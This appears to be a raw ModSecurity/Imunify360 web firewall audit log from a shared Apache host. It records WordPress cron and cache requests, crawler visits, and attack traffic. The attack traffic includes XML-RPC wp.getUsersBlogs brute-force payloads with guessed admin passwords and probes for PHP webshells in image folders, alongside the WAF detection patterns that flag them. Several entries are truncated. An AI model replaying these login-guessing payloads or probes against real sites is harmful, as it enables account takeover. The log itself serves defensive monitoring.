Stopwatch: 1751302380640042 6335 (- - -) Stopwatch2: 1751302380640042 6335; combined=4302, p1=91, p2=3948, p3=96, p4=3, p5=163, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --7b30582b-Z-- --1912bd77-A-- [30/Jun/2025:22:23:01.759164 +0530] aGLA7WtDMP7N-hHfRPbmtwAAABc 103.185.74.40 65529 192.168.74.40 443 --1912bd77-B-- POST /wp-cron.php?doing_wp_cron=1751302381.5285999774932861328125 HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --1912bd77-C-- --1912bd77-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --1912bd77-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751302381.5285999774932861328125& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751302381739923 19759 (- - -) Stopwatch2: 1751302381739923 19759; combined=6368, p1=136, p2=5155, p3=322, p4=7, p5=748, sr=45, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1912bd77-Z-- --74fce514-A-- [30/Jun/2025:22:23:04.622166 +0530] aGLA7134A3ejDf5wC_invQAAAFI 107.172.243.11 43850 192.168.74.40 443 --74fce514-B-- POST /xmlrpc.php HTTP/1.1 Host: carmictech.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Content-Length: 212 Accept: */* Accept-Encoding: gzip, zstd, deflate, br Accept-Language: ro-RO,ro;q=0.9 Content-Type: application/xml Referer: https://carmictech.com --74fce514-C-- <?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>admin1234</string></value></param></params></methodCall> -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b8ae8e32-Z-- --af688047-A-- [30/Jun/2025:22:43:42.489992 +0530] aGLFxslXOEafT1CY3KkAAAAAADg 103.211.202.20 57758 192.168.74.40 80 --af688047-B-- GET /server-status?auto HTTP/1.1 Host: 103.185.74.40 Accept: */* Accept-Encoding: deflate, gzip, br, zstd --af688047-F-- HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Content-Length: 1806 Content-Type: text/plain; charset=ISO-8859-1 --af688047-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:auto=& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: server-status Stopwatch: 1751303622484129 5910 (- - -) Stopwatch2: 1751303622484129 5910; combined=3656, p1=80, p2=3093, p3=73, p4=1, p5=408, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --af688047-Z-- --8f07923c-A-- [30/Jun/2025:22:43:42.897331 +0530] aGLFxtnCSrVZBPcRuCIzAQAAACs 20.171.207.232 54866 192.168.74.40 443 --8f07923c-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/images/aaina/1/js/shipping.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8f07923c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8f07923c-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/images/aaina/1/js/shipping.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/images/testimonials/rajasthan-tours-from-jodhpur/images/aaina/1/js/shipping.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751303622882562 14877 (- - -) Stopwatch2: 1751303622882562 14877; combined=2525, p1=124, p2=2276, p3=0, p4=0, p5=125, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8f07923c-Z-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751303901565094 810985 (- - -) Stopwatch2: 1751303901565094 810985; combined=2420, p1=153, p2=2029, p3=0, p4=0, p5=237, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --34876672-Z-- --b216596c-A-- [30/Jun/2025:22:48:24.014958 +0530] aGLG3ztLvL5g2y9UeGtY8QAAAAw 103.185.74.40 55662 192.168.74.40 443 --b216596c-B-- POST /wp-cron.php?doing_wp_cron=1751303903.7832961082458496093750 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --b216596c-C-- --b216596c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --b216596c-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=6563, p1=159, p2=6215, p3=186, p4=3, p5=0, sr=61, sw=0, l=0, gc=0||Py scan:10165||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751303903996519 18747 (- - -) Stopwatch2: 1751303903996519 18747; combined=6792, p1=159, p2=6215, p3=186, p4=3, p5=228, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b216596c-Z-- --2357085e-A-- [30/Jun/2025:22:48:24.704871 +0530] aGLG4PkIhZl9bYeKNmom7wAAABE 57.141.0.30 55476 192.168.74.40 443 --2357085e-B-- GET /rajasthan-tours-from-jaipur/rajasthan-tours-from-jaipur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-jaipur/Rajasthan-Travel-Guides/images/large.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --2357085e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2357085e-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305491751275 1344243 (- - -) Stopwatch2: 1751305491751275 1344243; combined=6471, p1=85, p2=5515, p3=236, p4=5, p5=546, sr=166, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --42e7725e-Z-- --070cdf00-A-- [30/Jun/2025:23:14:53.340957 +0530] aGLNCG_5qzls-jQQfTMBcQAAAAQ 103.185.74.40 38599 192.168.74.40 443 --070cdf00-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --070cdf00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --070cdf00-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305480242333 13099070 (- - -) Stopwatch2: 1751305480242333 13099070; combined=3003, p1=91, p2=2696, p3=0, p4=0, p5=216, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --070cdf00-Z-- --5cc91230-A-- [30/Jun/2025:23:14:53.990674 +0530] aGLNFQMc_C_fNh2qjATxRwAAAB8 20.171.207.232 43356 192.168.74.40 443 --5cc91230-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-agra/aainag/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5cc91230-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5cc91230-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305518428028 13414 (- - -) Stopwatch2: 1751305518428028 13414; combined=2257, p1=81, p2=1833, p3=0, p4=0, p5=342, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --adb6b164-Z-- --b98ea13f-A-- [30/Jun/2025:23:15:18.634745 +0530] aGLNDaFTwUQ6g1_nyFr5ZwAAAB4 103.185.74.40 34145 192.168.74.40 443 --b98ea13f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --b98ea13f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b98ea13f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751305485274485 33360690 (- - -) Stopwatch2: 1751305485274485 33360690; combined=2686, p1=80, p2=2449, p3=0, p4=0, p5=157, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b98ea13f-Z-- --46129e73-A-- [30/Jun/2025:23:15:18.644868 +0530] aGLNLiCJw31IkD-SP_a0ZgAAABU 47.128.112.222 18686 192.168.74.40 443 --46129e73-B-- GET /rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/https/https/Rajasthan-Travel-Guides/https/Rajasthan-Travel-Guides/images/logo.png HTTP/1.1 Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Accept: image/heif,image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://abhaytravelsindia.digitaltheka.com/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/https/https/Rajasthan-Travel-Guides/https/Rajasthan-Travel-Guides/Jaisalmer-City-Guide.php Accept-Encoding: identity Range: bytes=0-499 --46129e73-F-- HTTP/1.1 403 Forbidden -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306324549723 1656803 (- - -) Stopwatch2: 1751306324549723 1656803; combined=8624, p1=171, p2=7933, p3=283, p4=4, p5=232, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --5adc807a-Z-- --3f1bf548-A-- [30/Jun/2025:23:28:46.567859 +0530] aGLQVPq-bA86ckeGboN67gAAADo 103.185.74.40 42221 192.168.74.40 443 --3f1bf548-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --3f1bf548-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3f1bf548-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306324512236 2056128 (- - -) Stopwatch2: 1751306324512236 2056128; combined=3439, p1=118, p2=3178, p3=0, p4=0, p5=142, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3f1bf548-Z-- --d756ef17-A-- [30/Jun/2025:23:28:46.595159 +0530] aGLQU9pRgiBdy7JGN8wLTQAAACw 43.134.141.244 57346 192.168.74.40 443 --d756ef17-B-- GET /catering/embed/ HTTP/1.1 Host: byraveshwaracateringservice.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306323959478 2636282 (- - -) Stopwatch2: 1751306323959478 2636282; combined=3244, p1=133, p2=2871, p3=0, p4=0, p5=239, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d756ef17-Z-- --2097dd7b-A-- [30/Jun/2025:23:28:47.745243 +0530] aGLQVnIXvL-LWyQx7k_h0QAAAA8 103.185.74.40 19511 192.168.74.40 443 --2097dd7b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --2097dd7b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2097dd7b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" 
against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751306326782149 963701 (- - -) Stopwatch2: 1751306326782149 963701; combined=4171, p1=268, p2=3717, p3=0, p4=0, p5=186, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2097dd7b-Z-- --1421431f-A-- [30/Jun/2025:23:28:48.164368 +0530] aGLQWNBUnZzfIrlBZvN0uQAAACU 57.141.0.13 57514 192.168.74.40 443 --1421431f-B-- GET /rajasthan-tours-from-agra/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-jaipur/rajasthan-tours-from-delhi/rajasthan-tours-from-delhi/rajasthan-tours-from-jaipur/Rajasthan-Travel-Guides/images/testimonials/Rajasthan-Folk-Music-Songs.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --1421431f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309078339728 13816 (- - -) Stopwatch2: 1751309078339728 13816; combined=2539, p1=124, p2=2300, p3=0, p4=0, p5=114, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3fd9024b-Z-- --e0013d67-A-- [01/Jul/2025:00:14:38.660547 +0530] aGLbFKaXLCRo8Qw21kmbpAAAAAk 103.185.74.40 44414 192.168.74.40 443 --e0013d67-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e0013d67-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e0013d67-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309076556830 2104156 (- - -) Stopwatch2: 1751309076556830 2104156; combined=2520, p1=106, p2=2268, p3=0, p4=0, p5=145, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e0013d67-Z-- --e743fd62-A-- [01/Jul/2025:00:14:39.495523 +0530] aGLbFw8JLIiTsjmkw06R_QAAAAs 20.171.207.232 50464 192.168.74.40 443 --e743fd62-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/js/images/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e743fd62-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e743fd62-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309078969903 1842539 (- - -) Stopwatch2: 1751309078969903 1842539; combined=12304, p1=148, p2=4584, p3=359, p4=7, p5=3804, sr=73, sw=134, l=0, gc=3268 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dd20bd48-Z-- --3376d92b-A-- [01/Jul/2025:00:14:40.993574 +0530] aGLbFsdEQ__eLfsh0hRUsgAAAAM 103.185.74.40 24872 192.168.74.40 443 --3376d92b-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3376d92b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3376d92b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309078872360 2121820 (- - -) Stopwatch2: 1751309078872360 2121820; combined=2259, p1=84, p2=2025, p3=0, p4=0, p5=149, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3376d92b-Z-- --49257645-A-- [01/Jul/2025:00:14:41.145908 +0530] aGLbF6fYZ8LycUo6QhycCAAAAAo 205.185.122.222 50910 192.168.74.40 443 --49257645-B-- GET /wp-login.php HTTP/1.1 Host: byraveshwaracateringservice.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 --49257645-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 35f_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --13bf4274-Z-- --a7eb6416-A-- [01/Jul/2025:00:21:47.217761 +0530] aGLcw-OwazA7aFZNrK5UfQAAAA4 43.135.145.73 59176 192.168.74.40 80 --a7eb6416-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --a7eb6416-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --a7eb6416-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751309507211224 6812 (- - -) Stopwatch2: 1751309507211224 6812; combined=3998, p1=98, p2=3641, p3=112, p4=2, p5=144, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a7eb6416-Z-- --946ae93b-A-- [01/Jul/2025:00:21:47.264504 +0530] aGLcwsDrLf0EZixN_KGfAAAAAAc 34.169.166.192 55743 192.168.74.40 80 --946ae93b-B-- POST /xmlrpc.php HTTP/1.1 Host: maimufashions.in Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 486 --946ae93b-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>xmagico</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --946ae93b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 -- Server: Apache Engine-Mode: "ENABLED" --d995ee2a-Z-- --d995ee2a-A-- [01/Jul/2025:00:25:39.733244 +0530] aGLdq_yJlIQQxre3dCUaCwAAAB0 172.70.108.135 51888 192.168.74.40 80 